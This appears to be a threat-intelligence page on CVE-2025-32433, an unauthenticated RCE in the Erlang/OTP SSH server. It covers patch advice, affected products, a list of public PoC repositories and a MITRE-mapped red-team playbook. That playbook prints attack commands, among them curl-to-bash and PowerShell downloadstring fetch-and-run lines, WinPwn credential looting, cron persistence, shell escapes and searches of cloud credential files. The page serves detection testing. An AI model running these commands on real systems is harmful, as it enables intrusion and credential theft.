CVE-2025-32433

CRITICAL CISA KEV EXPLOIT POC TTE Zero-Day Pub 16/04 Upd 26/02

Overview

This vulnerability is an authentication bypass in the SSH server component of Erlang/OTP caused by improper handling of SSH protocol messages. Specifically, the SSH server fails to correctly validate incoming protocol messages, allowing unauthenticated remote actors to manipulate message processing flow. The flaw resides in the SSH server implementation within the Erlang/OTP libraries prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, affecting the SSH protocol message parser and authentication logic.

Vulnerability Description

Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20, a SSH server may allow an attacker to perform unauthenticated remote code execution (RCE). By exploiting a flaw in SSH protocol message handling, a malicious actor could gain unauthorized access to affected systems and execute arbitrary commands without valid credentials. This issue is patched in versions OTP-27.3.3, OTP-26.2.5.11, and OTP-25.3.2.20. A temporary workaround involves disabling the SSH server or to prevent access via firewall rules.

Impact

An unauthenticated attacker can remotely execute arbitrary commands on affected systems by exploiting the SSH server without any credentials or user interaction. This leads to full system compromise, enabling data exfiltration, installation of persistent malware, or lateral movement within a network. The vulnerability allows complete control over the target host through the compromised SSH service, posing critical threats to confidentiality, integrity, and availability of affected environments.

Solution

Upgrade Erlang/OTP to versions OTP-27.3.3, OTP-26.2.5.11, or OTP-25.3.2.20 as specified in the official Erlang/OTP security advisory GHSA-37cp-fgq5-7wc2. Detailed patch instructions and source code fixes are available at the Erlang GitHub repository commits 0fcd9c56524b28615e8ece65fc0c3f66ef6e4c12 and 6eef04130afc8b0ccb63c9a0d8650209cf54892f. As a temporary workaround, disable the SSH server or restrict access via firewall rules until patching is applied.

EPSS vs KEV Prediction — Evolution (30 days)

Full Analysis

The vulnerability in the Erlang/OTP libraries, specifically within the SSH server implementation, presents a critical risk due to its potential for unauthenticated remote code execution (RCE). This flaw arises from improper handling of SSH protocol messages, allowing an attacker to bypass authentication mechanisms entirely. By exploiting this weakness, an adversary can execute arbitrary commands on the affected system without requiring valid credentials. The severity of this vulnerability is underscored by its perfect score on the Common Vulnerability Scoring System (CVSS), indicating that it poses an extreme threat to the confidentiality, integrity, and availability of the systems involved.

Attack vectors associated with this vulnerability are particularly concerning due to the ease with which they can be executed. An attacker could leverage this flaw remotely, requiring no physical access to the target system. The exploitation process may involve sending specially crafted SSH messages that the server mishandles, leading to the execution of unauthorized commands. Given the widespread use of Erlang/OTP in various applications, including telecommunications and distributed systems, the potential for exploitation is vast. Additionally, the presence of affected Cisco products further amplifies the risk, as these devices are often integral to enterprise networks and critical infrastructure.

The real-world impact of this vulnerability is substantial, with significant implications for business operations and data security. Organizations utilizing affected versions of Erlang/OTP or Cisco products may find themselves vulnerable to data breaches, system compromise, and service disruptions. The ability for an attacker to execute arbitrary code remotely means that they could manipulate or exfiltrate sensitive data, deploy malware, or even take control of critical systems. The financial repercussions of such incidents can be severe, including regulatory fines, loss of customer trust, and the costs associated with incident response and recovery efforts.

To effectively address this vulnerability, organizations must implement robust detection and mitigation strategies. Immediate steps should include upgrading to the patched versions of Erlang/OTP, which rectify the flaw in the SSH server. In scenarios where immediate upgrades are not feasible, temporary workarounds such as disabling the SSH server or restricting access through firewall rules should be employed to minimize exposure. Continuous monitoring for unusual activity on affected systems is also essential, as it can help detect potential exploitation attempts. Organizations should consider employing intrusion detection systems (IDS) and conducting regular security assessments to identify and remediate vulnerabilities proactively.

In conclusion, the vulnerability within the SSH server of Erlang/OTP represents a critical security threat that can lead to severe consequences for affected organizations. Given the ease of exploitation and the potential for significant business impact, it is imperative for organizations to prioritize the implementation of security patches and to adopt comprehensive security practices. By doing so, they can safeguard their systems against unauthorized access and ensure the integrity of their operations in an increasingly complex threat landscape.




CSURFACE threat intelligence has detected a marked escalation in exploitation attempts targeting CVE-2025-32433, coinciding with the emergence of new proof-of-concept exploit tools circulating on public repositories. This development indicates that threat actors are increasingly equipped to leverage the unauthenticated remote code execution vulnerability in Erlang/OTP SSH servers. Although the EPSS score has slightly decreased, our telemetry reveals a sharp upward trend in detection activity, suggesting growing adversary interest and operationalization of this flaw. The availability of multiple publicly accessible exploit implementations lowers the barrier for exploitation, broadening the potential attacker base beyond highly skilled actors. Consequently, the threat level associated with this vulnerability has intensified, elevating it from a theoretical risk to a more imminent and actionable threat for defenders monitoring Erlang/OTP deployments. This shift underscores the urgency for heightened vigilance in network monitoring and incident response readiness.



Update 2 — June 13, 2026

CSURFACE threat intelligence has identified a notable increase in the Exploit Prediction Scoring System (EPSS) score for CVE-2025-32433, rising by approximately 17%, signaling an elevated likelihood of exploitation in the near term. This upward trend coincides with a marked reduction in detection activity across our sensors, which may indicate adversaries are refining their tactics to evade existing monitoring mechanisms. Concurrently, the exploit landscape has expanded with the emergence of several new proof-of-concept tools publicly available on GitHub, lowering the technical barrier for threat actors to leverage this critical pre-authentication remote code execution vulnerability. While ransomware usage remains unconfirmed, the combination of increased exploitability and stealthier attack patterns heightens the risk profile for organizations running Erlang/OTP SSH servers. This evolving environment necessitates that defenders recognize the shift from theoretical risk to a more imminent and actionable threat, as adversaries appear to be operationalizing the vulnerability with greater sophistication and persistence.



Update 3 — July 05, 2026

CSURFACE threat intelligence has detected a slight increase in exploitation attempts targeting CVE-2025-32433, accompanied by a growing number of publicly available proof-of-concept exploits on GitHub. This uptick in activity, while not yet rapid, signals a gradual operationalization of the vulnerability by threat actors. The expanded availability of technical resources lowers the barrier for less sophisticated adversaries to attempt remote code execution against vulnerable Erlang/OTP SSH servers. Although ransomware involvement remains unconfirmed, the persistence and diversification of exploit techniques suggest an evolving threat landscape that could facilitate broader attack campaigns. Consequently, the risk level for organizations running affected Erlang/OTP versions has shifted from theoretical to more imminent, warranting heightened vigilance as adversaries increasingly integrate this critical flaw into their toolsets.

Affected Products (34)

Vendor Product Version CPE
erlang Erlang Erlang\/otp All cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:*
erlang Erlang Erlang\/otp All cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:*
erlang Erlang Erlang\/otp All cpe:2.3:a:erlang:erlang\/otp:*:*:*:*:*:*:*:*
cisco Cisco Confd Basic All cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
cisco Cisco Confd Basic All cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
cisco Cisco Confd Basic All cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
cisco Cisco Confd Basic All cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
cisco Cisco Confd Basic All cpe:2.3:a:cisco:confd_basic:*:*:*:*:*:*:*:*
cisco Cisco Network Services Orchestrator All cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
cisco Cisco Network Services Orchestrator All cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
cisco Cisco Network Services Orchestrator All cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
cisco Cisco Network Services Orchestrator All cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
cisco Cisco Network Services Orchestrator All cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
cisco Cisco Network Services Orchestrator All cpe:2.3:a:cisco:network_services_orchestrator:*:*:*:*:*:*:*:*
cisco Cisco Cloud Native Broadband Network Gateway All cpe:2.3:a:cisco:cloud_native_broadband_network_gateway:*:*:*:*:*:*:*:*
cisco Cisco Inode Manager N/A cpe:2.3:a:cisco:inode_manager:-:*:*:*:*:*:*:*
cisco Cisco Smart Phy All cpe:2.3:a:cisco:smart_phy:*:*:*:*:*:*:*:*
cisco Cisco Ultra Packet Core All cpe:2.3:a:cisco:ultra_packet_core:*:*:*:*:*:*:*:*
cisco Cisco Ultra Services Platform N/A cpe:2.3:a:cisco:ultra_services_platform:-:*:*:*:*:*:*:*
cisco Cisco Staros All cpe:2.3:o:cisco:staros:*:*:*:*:*:*:*:*
+14 additional CPEs
Warning: The exploits and proof-of-concept (PoC) code listed below are sourced from third-party public repositories. CSURFACE assumes no responsibility for the content, accuracy, or safety of these resources. Use at your own risk. Learn more

Metasploit (1)

Module Authors Rank Platform Link
Erlang OTP Pre-Auth RCE Scanner and Exploit
exploits/linux/ssh/ssh_erlangotp_rce
Horizon3 Attack Team, Matt Keeley, Martin Kristiansen +1 Unknown - View

GitHub PoCs (41)

Repository Author Stars Forks Date Link
ProDefense/CVE-2025-32433
CVE-2025-32433 https://github.com/erlang/otp/security/advisories/GHSA-37cp-fgq5-7wc2
ProDefense 142 27 2025-04-18 View
omer-efe-curkus/CVE-2025-32433-Erlang-OTP-SSH-RCE-PoC
The vulnerability allows an attacker with network access to an Erlang/OTP SSH server to execute arbitrary code without p...
omer-efe-curkus 16 2 2025-04-18 View
NiteeshPujari/CVE-2025-32433-PoC
CVE-2025-32433 PoC: Unauthenticated Remote Code Execution (RCE) in Erlang/OTP SSH. A proof-of-concept exploit for CVE-20...
NiteeshPujari 7 1 2025-08-13 View
ekomsSavior/POC_CVE-2025-32433
ekomsSavior 5 2 2025-04-18 View
m0usem0use/erl_mouse
python script to find vulnerable targets of CVE-2025-32433
m0usem0use 5 2 2025-04-18 View
0xPThree/cve-2025-32433
0xPThree 6 1 2025-04-19 View
exa-offsec/ssh_erlangotp_rce
Exploitation module for CVE-2025-32433 (Erlang/OTP)
exa-offsec 3 1 2025-04-18 View
darses/CVE-2025-32433
Security research on Erlang/OTP SSH CVE-2025-32433.
darses 3 0 2025-04-18 View
LemieOne/CVE-2025-32433
Missing Authentication for Critical Function (CWE-306)-Exploit
LemieOne 3 0 2025-04-18 View
0x7556/CVE-2025-32433
CVE-2025-32433 Erlang/OTP SSH RCE Exploit SSH远程代码执行漏洞EXP
0x7556 3 0 2025-04-25 View
AntonieSoga/Erlang-OTP-PoC_CVE-2025-32433
AntonieSoga 2 1 2025-12-29 View
yonathanpy/CVE-2025-32433.py
CVE-2025-32433 PoC – SSH Protocol Python-based PoC for controlled lab testing of SSH message handling, channel operation...
yonathanpy 2 1 2026-02-26 View
dollarboysushil/CVE-2025-32433-Erlang-OTP-SSH-Unauthenticated-RCE
PoC showing unauthenticated remote code execution in Erlang/OTP SSH server. By exploiting a flaw in SSH protocol message...
dollarboysushil 3 0 2025-09-07 View
Yuri08loveElaina/CVE-2025-32433-Erlang-OTP-SSH-Pre-Auth-RCE-exploit
Erlang/OTP is a set of libraries for the Erlang programming language. Prior to versions OTP-27.3.3, OTP-26.2.5.11, and O...
Yuri08loveElaina 2 1 2025-06-15 View
mirmeweu/cve-2025-32433
the task from C*****k
mirmeweu 2 0 2025-09-24 View
joshuavanderpoll/cve-2025-32433
Go PoC for CVE-2025-32433 — unauthenticated RCE in Erlang/OTP SSH.
joshuavanderpoll 2 0 2026-03-07 View
abrewer251/CVE-2025-32433_Erlang-OTP_PoC
This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems runnin...
abrewer251 0 2 2025-04-29 View
MrDreamReal/CVE-2025-32433
CVE-2025-32433 Summary and Attack Overview
MrDreamReal 0 2 2025-04-27 View
teamtopkarl/CVE-2025-32433
Erlang/OTP SSH 远程代码执行漏洞
teamtopkarl 1 0 2025-04-18 View
becrevex/CVE-2025-32433
Erlang OTP SSH NSE Discovery Script
becrevex 1 0 2025-04-25 View
bilalz5-github/Erlang-OTP-SSH-CVE-2025-32433
CVE-2025-32433 – Erlang/OTP SSH vulnerability allowing pre-auth RCE
bilalz5-github 1 0 2025-05-02 View
iteride/CVE-2025-32433
test
iteride 1 0 2025-09-18 View
Know56/CVE-2025-32433
CVE-2025-32433 is a vuln of ssh
Know56 1 0 2025-04-28 View
dampedcoast/Exploiting-a-vulnerability-using-reverse-shell
This project simulates a real-world attack-and-defend scenario across two virtual machines. You will exploit a critical ...
dampedcoast 0 0 2026-06-12 View
chuzouX/CVE-2025-32433-Exploit-edited
Based on the original version:https://github.com/vulhub/vulhub/blob/master/erlang/CVE-2025-32433/exploit.py Replace Unic...
chuzouX 0 0 2026-06-08 View
leehunkoo/hk_CVE-2025-32433
leehunkoo 0 0 2026-06-03 View
l1nuxkid/CVE-2025-32433-exploit
l1nuxkid 0 0 2025-11-08 View
0xBlackash/CVE-2025-32433
CVE-2025-32433
0xBlackash 0 0 2026-04-09 View
C9b3rD3vi1/Erlang-OTP-SSH-CVE-2025-32433
Exploit Erlang/OTP SSH CVE-2025-32433 in a lab setup.
C9b3rD3vi1 0 0 2025-04-29 View
Epivalent/CVE-2025-32433-detection
Epivalent 0 0 2025-04-18 View
meloppeitreet/CVE-2025-32433-Remote-Shell
Go-based exploit for CVE-2025-32433
meloppeitreet 0 0 2025-04-19 View
ps-interactive/lab_CVE-2025-32433
CVE lab to accompany CVE course for CVE-2025-32433
ps-interactive 0 0 2025-04-24 View
ODST-Forge/CVE-2025-32433_PoC
This script is a custom security tool designed to test for a critical pre-authentication vulnerability in systems runnin...
ODST-Forge 0 0 2025-04-29 View
vigilante-1337/CVE-2025-32433
A critical flaw has been discovered in Erlang/OTP's SSH server allows unauthenticated attackers to gain remote code exec...
vigilante-1337 0 0 2025-05-03 View
te0rwx/CVE-2025-32433-Detection
te0rwx 0 0 2025-08-27 View
soltanali0/CVE-2025-32433-Eploit
Erlang/OTP SSH Vulnerable to Pre-Authentication RCE
soltanali0 0 0 2025-11-27 View
agustfricke/erlang-ssh-rce-CVE-2025-32433
agustfricke 0 0 2026-03-03 View
carlosalbertotuma/CVE-2025-32433
carlosalbertotuma 0 0 2026-02-24 View
blackcat4347/CVE-2025-32433-available-for-windows
CVE-2025-32433-available-for-windows
blackcat4347 0 0 2026-02-02 View
Mdusmandasthaheer/CVE-2025-32433
Mdusmandasthaheer 0 0 2025-08-28 View
giriaryan694-a11y/cve-2025-32433_rce_exploit
This exploit script is designed to simplify exploitation of the Erlang/OTP SSH vulnerability CVE-2025-32433 in the TryHa...
giriaryan694-a11y 0 0 2025-12-25 View
Exploited in Wild CONFIRMED
Ransomware NOT ASSOCIATED
Attacker Interest MEDIUM
Sightings Few sightings

Threat Feed

9 events
2026-06-30
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-23
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-19
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-13
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-06-08
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2026-04-15
Threat Sensor Sighting — Few sightings

Sighting activity recorded

2025-06-09
Added to CISA KEV Catalog

CISA confirmed active exploitation — added to Known Exploited Vulnerabilities catalog

2025-04-18
PoC Published (41 GitHub repositories)

Proof-of-concept code is publicly available for this vulnerability

2025-04-16
Exploit Published (0 ExploitDB, 1 Metasploit)

Public exploit code is available for this vulnerability

Likely Kill Chain

Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.

Applicable Out of scope
Initial Access
TA0001
Execution
TA0002
Persistence
TA0003
Priv. Escalation
TA0004
Defense Evasion
TA0005
Credential Access
TA0006
Lateral Movement
TA0008
Collection
TA0009
Impact
TA0040

Kill chain derived from the ML classifier.

Attack Vectors ML

Authentication Bypass
100% auth_bypass
Authorization Bypass
83% authz_bypass
Remote Code Execution
78% rce
Insecure Direct Object Reference
75% idor
OS Command Injection
55% command_injection

MITRE ATT&CK Techniques (6)

The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.

ID Name Stage Tactics Platforms Link
T1190 Exploit Public-Facing Application Initial Access initial-access Containers, ESXi, IaaS, Linux, macOS, Network Devices, Windows
T1053.003 Cron Kill Chain execution, persistence, privilege-escalation Linux, macOS, ESXi
T1059.004 Unix Shell Kill Chain execution ESXi, Linux, macOS, Network Devices
T1552.001 Credentials In Files Kill Chain credential-access Containers, IaaS, Linux, macOS, Windows
T1049 System Network Connections Discovery Kill Chain discovery Windows, IaaS, Linux, macOS, Network Devices, ESXi
T1021.004 SSH Kill Chain lateral-movement ESXi, Linux, macOS

CAPEC Attack Patterns ML

ID Name ML Conf. Likelihood Severity Link
CAPEC-12 Choosing Message Identifier
38%
High High
CAPEC-62 Cross Site Request Forgery
38%
High Very High
CAPEC-36 Using Unpublished Interfaces or Functionality
35%
Medium High
CAPEC-166 Force the System to Reset Values
31%
Medium
CAPEC-216 Communication Channel Manipulation
30%

Red Team Playbook

47 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.

T1021.004 ESXi - Enable SSH via PowerCLI Windows PowerShell Privileged
An adversary enables the SSH service on a ESXi host to maintain persistent access to the host and to carryout subsequent operations.
Command (PowerShell)
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false 
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
T1021.004 ESXi - Enable SSH via VIM-CMD Windows CMD
An adversary enables SSH on an ESXi host to maintain persistence and creeate another command execution interface. [Reference](https://lolesxi-project.github.io/LOLESXi/lolesxi/Binaries/vim-cmd/#enable%20service)
Command (CMD)
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
T1049 System Discovery using SharpView Windows PowerShell Privileged
Get a listing of network connections, domains, domain users, and etc. sharpview.exe located in the bin folder, an opensource red-team tool. Upon successful execution, cmd.exe will execute sharpview.exe <method>. Results will output via stdout.
Command (PowerShell)
$syntaxList = #{syntax}
foreach ($syntax in $syntaxList) {
#{SharpView} $syntax -}
T1049 System Network Connections Discovery Windows CMD
Get a listing of network connections. Upon successful execution, cmd.exe will execute `netstat`, `net use` and `net sessions`. `net sessions` requires elevated privileges; on standard user accounts this command may not return results. Results will output via stdout.
Command (CMD)
netstat -ano
net use
net sessions 2>nul
T1049 System Network Connections Discovery FreeBSD, Linux & MacOS Linux, macOS Shell
Get a listing of network connections. Upon successful execution, sh will execute `netstat` and `who -a`. Results will output via stdout.
Command (Shell)
netstat
who -a
T1049 System Network Connections Discovery via PowerShell (Process Mapping) Windows PowerShell
Enumerate TCP connections and map to owning process names via PowerShell.
Command (PowerShell)
Get-NetTCPConnection | ForEach-Object {
  $p = Get-Process -Id $_.OwningProcess -ErrorAction SilentlyContinue
  [pscustomobject]@{
    Local   = "$($_.LocalAddress):$($_.LocalPort)"
    Remote  = "$($_.RemoteAddress):$($_.RemotePort)"
    State   = $_.State
    PID     = $_.OwningProcess
    Process = if ($p) { $p.ProcessName } else { $null }
  }
} | Sort-Object State,Process | Format-Table -AutoSize
T1049 System Network Connections Discovery via sockstat (Linux, FreeBSD) Linux Shell
Enumerate IPv4/IPv6 network endpoints on FreeBSD using sockstat.
Command (Shell)
sockstat -4
sockstat -6 2>/dev/null || true
sockstat -l 2>/dev/null || true
T1049 System Network Connections Discovery via ss or lsof (Linux/MacOS) Linux, macOS Bash
List active TCP/UDP network connections using ss, with lsof as a fallback when ss is unavailable. Serves as an alternative to the netstat-based test.
Command (Bash)
if command -v ss >/dev/null 2>&1; then ss -antp 2>/dev/null || ss -ant; ss -aunp 2>/dev/null || true; else lsof -i -nP 2>/dev/null || true; fi
T1049 System Network Connections Discovery with PowerShell Windows PowerShell
Get a listing of network connections. Upon successful execution, powershell.exe will execute `get-NetTCPConnection`. Results will output via stdout.
Command (PowerShell)
Get-NetTCPConnection
T1053.003 Cron - Add script to /etc/cron.d folder Linux Shell Privileged
This test adds a script to /etc/cron.d folder configured to execute on a schedule.
Command (Shell)
echo "#{command}" > /etc/cron.d/#{cron_script_name}
T1053.003 Cron - Add script to /var/spool/cron/crontabs/ folder Linux Bash Privileged
This test adds a script to a /var/spool/cron/crontabs folder configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Command (Bash)
echo "#{command}" >> /var/spool/cron/crontabs/#{cron_script_name}
T1053.003 Cron - Add script to all cron subfolders Linux, macOS Bash Privileged
This test adds a script to /etc/cron.hourly, /etc/cron.daily, /etc/cron.monthly and /etc/cron.weekly folders configured to execute on a schedule. This technique was used by the threat actor Rocke during the exploitation of Linux web servers.
Command (Bash)
echo "#{command}" > /etc/cron.daily/#{cron_script_name}
echo "#{command}" > /etc/cron.hourly/#{cron_script_name}
echo "#{command}" > /etc/cron.monthly/#{cron_script_name}
echo "#{command}" > /etc/cron.weekly/#{cron_script_name}
T1053.003 Cron - Replace crontab with referenced file Linux, macOS Shell
This test replaces the current user's crontab file with the contents of the referenced file. This technique was used by numerous IoT automated exploitation attacks.
Command (Shell)
crontab -l > /tmp/notevil
echo "* * * * * #{command}" > #{tmp_cron} && crontab #{tmp_cron}
T1059.004 Change login shell Linux Bash Privileged
An adversary may want to use a different login shell. The chsh command changes the user login shell. The following test, creates an art user with a /bin/bash shell, changes the users shell to sh, then deletes the art user.
Command (Bash)
[ "$(uname)" = 'FreeBSD' ] && pw useradd art -g wheel -s /bin/csh || useradd -s /bin/bash art
cat /etc/passwd |grep ^art
chsh -s /bin/sh art
cat /etc/passwd |grep ^art
T1059.004 Command line scripts Linux Shell
An adversary may type in elaborate multi-line shell commands into a terminal session because they can't or don't wish to create script files on the host. The following command is a simple loop, echoing out Atomic Red Team was here!
Command (Shell)
for i in $(seq 1 5); do echo "$i, Atomic Red Team was here!"; sleep 1; done
T1059.004 Command-Line Interface Linux, macOS Shell
Using Curl to download and pipe a payload to Bash. NOTE: Curl-ing to Bash is generally a bad idea if you don't control the server. Upon successful execution, sh will download via curl and wget the specified payload (echo-art-fish.sh) and set a marker file in `/tmp/art-fish.txt`.
Command (Shell)
curl -sS https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
wget --quiet -O - https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1059.004/src/echo-art-fish.sh | bash
T1059.004 Create and Execute Bash Shell Script Linux, macOS Shell
Creates and executes a simple sh script.
Command (Shell)
sh -c "echo 'echo Hello from the Atomic Red Team' > #{script_path}"
sh -c "echo 'ping -c 4 #{host}' >> #{script_path}"
chmod +x #{script_path}
sh #{script_path}
T1059.004 Creating shell using cpan command Linux, macOS Shell
cpan lets you execute perl commands with the ! command. It can be used to break out from restricted environments by spawning an interactive system shell. Reference - https://gtfobins.github.io/gtfobins/cpan/
Command (Shell)
echo '! exec "/bin/sh &"' | PERL_MM_USE_DEFAULT=1  cpan
T1059.004 Current kernel information enumeration Linux Shell
An adversary may want to enumerate the kernel information to tailor their attacks for that particular kernel. The following command will enumerate the kernel information.
Command (Shell)
uname -srm
T1059.004 Detecting pipe-to-shell Linux Shell
An adversary may develop a useful utility or subvert the CI/CD pipe line of a legitimate utility developer, who requires or suggests installing their utility by piping a curl download directly into bash. Of-course this is a very bad idea. The adversary may also take advantage...
Command (Shell)
cd /tmp
curl -s #{remote_url} |bash
ls -la /tmp/art.txt      
T1059.004 Environment variable scripts Linux Shell
An adversary may place scripts in an environment variable because they can't or don't wish to create script files on the host. The following test, in a bash shell, exports the ART variable containing an echo command, then pipes the variable to /bin/bash
Command (Shell)
export ART='echo "Atomic Red Team was here... T1059.004"'
echo $ART |/bin/sh
T1059.004 Harvest SUID executable files Linux Shell
AutoSUID application is the Open-Source project, the main idea of which is to automate harvesting the SUID executable files and to find a way for further escalating the privileges.
Command (Shell)
chmod +x #{autosuid}
bash #{autosuid}
T1059.004 LinEnum tool execution Linux Shell
LinEnum is a bash script that performs discovery commands for accounts,processes, kernel version, applications, services, and uses the information from these commands to present operator with ways of escalating privileges or further exploitation of targeted host.
Command (Shell)
chmod +x #{linenum}
bash #{linenum}
T1059.004 New script file in the tmp directory Linux Shell
An attacker may create script files in the /tmp directory using the mktemp utility and execute them. The following commands creates a temp file and places a pointer to it in the variable $TMPFILE, echos the string id into it, and then executes the file using bash, which...
Command (Shell)
TMPFILE=$(mktemp)
echo "id" > $TMPFILE
bash $TMPFILE
T1059.004 Obfuscated command line scripts Linux Shell
An adversary may pre-compute the base64 representations of the terminal commands that they wish to execute in an attempt to avoid or frustrate detection. The following commands base64 encodes the text string id, then base64 decodes the string, then pipes it as a command to...
Command (Shell)
[ "$(uname)" = 'FreeBSD' ] && encodecmd="b64encode -r -" && decodecmd="b64decode -r" || encodecmd="base64 -w 0" && decodecmd="base64 -d"
ART=$(echo -n "id" | $encodecmd)
echo "\$ART=$ART"
echo -n "$ART" | $decodecmd |/bin/bash
unset ART
T1059.004 Shell Creation using awk command Linux, macOS Shell
In awk the begin rule runs the first record without reading or interpreting it. This way a shell can be created and used to break out from restricted environments with the awk command. Reference - https://gtfobins.github.io/gtfobins/awk/#shell
Command (Shell)
awk 'BEGIN {system("/bin/sh &")}'
T1059.004 Shell Creation using busybox command Linux Shell
BusyBox is a multi-call binary. A multi-call binary is an executable program that performs the same job as more than one utility program. It can be used to break out from restricted environments by spawning an interactive system shell. Reference -...
Command (Shell)
busybox sh &
T1059.004 What shell is running Linux Shell
An adversary will want to discover what shell is running so that they can tailor their attacks accordingly. The following commands will discover what shell is running.
Command (Shell)
echo $0
if $(env |grep "SHELL" >/dev/null); then env |grep "SHELL"; fi
if $(printenv SHELL >/dev/null); then printenv SHELL; fi
T1059.004 What shells are available Linux Shell
An adversary may want to discover which shell's are available so that they might switch to that shell to tailor their attacks to suit that shell. The following commands will discover what shells are available on the host.
Command (Shell)
cat /etc/shells 
T1059.004 emacs spawning an interactive system shell Linux, macOS Shell Privileged
emacs can be used to break out from restricted environments by spawning an interactive system shell. Ref: https://gtfobins.github.io/gtfobins/emacs/
Command (Shell)
sudo emacs -Q -nw --eval '(term "/bin/sh &")'
T1552.001 Access unattend.xml Windows CMD Privileged
Attempts to access unattend.xml, where credentials are commonly stored, within the Panther directory where installation logs are stored. If these files exist, their contents will be displayed. They are used to store credentials/answers during the unattended windows install process.
Command (CMD)
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
T1552.001 Extract Browser and System credentials with LaZagne macOS Bash Privileged
[LaZagne Source](https://github.com/AlessandroZ/LaZagne)
Command (Bash)
python2 laZagne.py all
T1552.001 Extract passwords with grep Linux, macOS Shell
Extracting credentials from files
Command (Shell)
grep -ri password #{file_path}
exit 0
T1552.001 Extracting passwords with findstr Windows PowerShell
Extracting Credentials from Files. Upon execution, the contents of files that contain the word "password" will be displayed.
Command (PowerShell)
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
T1552.001 Find AWS credentials Linux, macOS Shell
Find local AWS credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
T1552.001 Find Azure credentials Linux, macOS Shell
Find local Azure credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
T1552.001 Find GCP credentials Linux, macOS Shell
Find local Google Cloud Platform credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
T1552.001 Find OCI credentials Linux, macOS Shell
Find local Oracle cloud credentials from file, defaults to using / as the look path.
Command (Shell)
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
T1552.001 Find and Access Github Credentials Linux, macOS Bash
This test looks for .netrc files (which stores github credentials in clear text )and dumps its contents if found.
Command (Bash)
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
T1552.001 List Credential Files via Command Prompt Windows CMD Privileged
Via Command Prompt,list files where credentials are stored in Windows Credential Manager
Command (CMD)
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
T1552.001 List Credential Files via PowerShell Windows PowerShell Privileged
Via PowerShell,list files where credentials are stored in Windows Credential Manager
Command (PowerShell)
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
T1552.001 WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials Windows PowerShell
Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials technique via function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive  
T1552.001 WinPwn - SessionGopher Windows PowerShell
Launches SessionGopher on this system via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
T1552.001 WinPwn - Snaffler Windows PowerShell
Check Domain Network-Shares for cleartext passwords using Snaffler function of WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
T1552.001 WinPwn - passhunt Windows PowerShell
Search for Passwords on this system using passhunt via WinPwn
Command (PowerShell)
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
